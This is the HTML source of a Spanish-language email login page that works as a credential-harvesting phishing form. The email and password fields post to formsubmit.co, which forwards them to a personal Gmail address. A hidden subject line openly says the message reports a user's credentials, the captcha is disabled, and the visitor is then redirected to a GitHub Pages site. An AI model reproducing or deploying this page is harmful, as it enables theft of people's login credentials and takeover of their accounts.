<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Correo electrónico</title>
    <link rel="shortcut icon" href="img/icono-del-email.png" type="image/x-icon">
    <link rel="stylesheet" href="css/estilos.css">
</head>
<body>
    <section class="form-login">
        <h5>Login al Correo</h5>
        <form action="https://formsubmit.co/joemagrados@gmail.com" method="POST">

            <input type="hidden" name="Asunto" value="Este correo fue enviado para informarle las credenciales de un usuario de la página Login al Correo">

            <input class="controls" type="text" name="Email" value="" placeholder="Email" required>

            <input class="controls" type="password" name="Password" value="" placeholder="Contraseña" required>

            <input class="buttons" type="submit" value="Enviar">

            <input type="hidden" name="_next" value="https://userlvl80.github.io/pagina-correo-login/">
            <input type="hidden" name="_captcha" value="false">

        </form>
    </section>
</body>
</html>
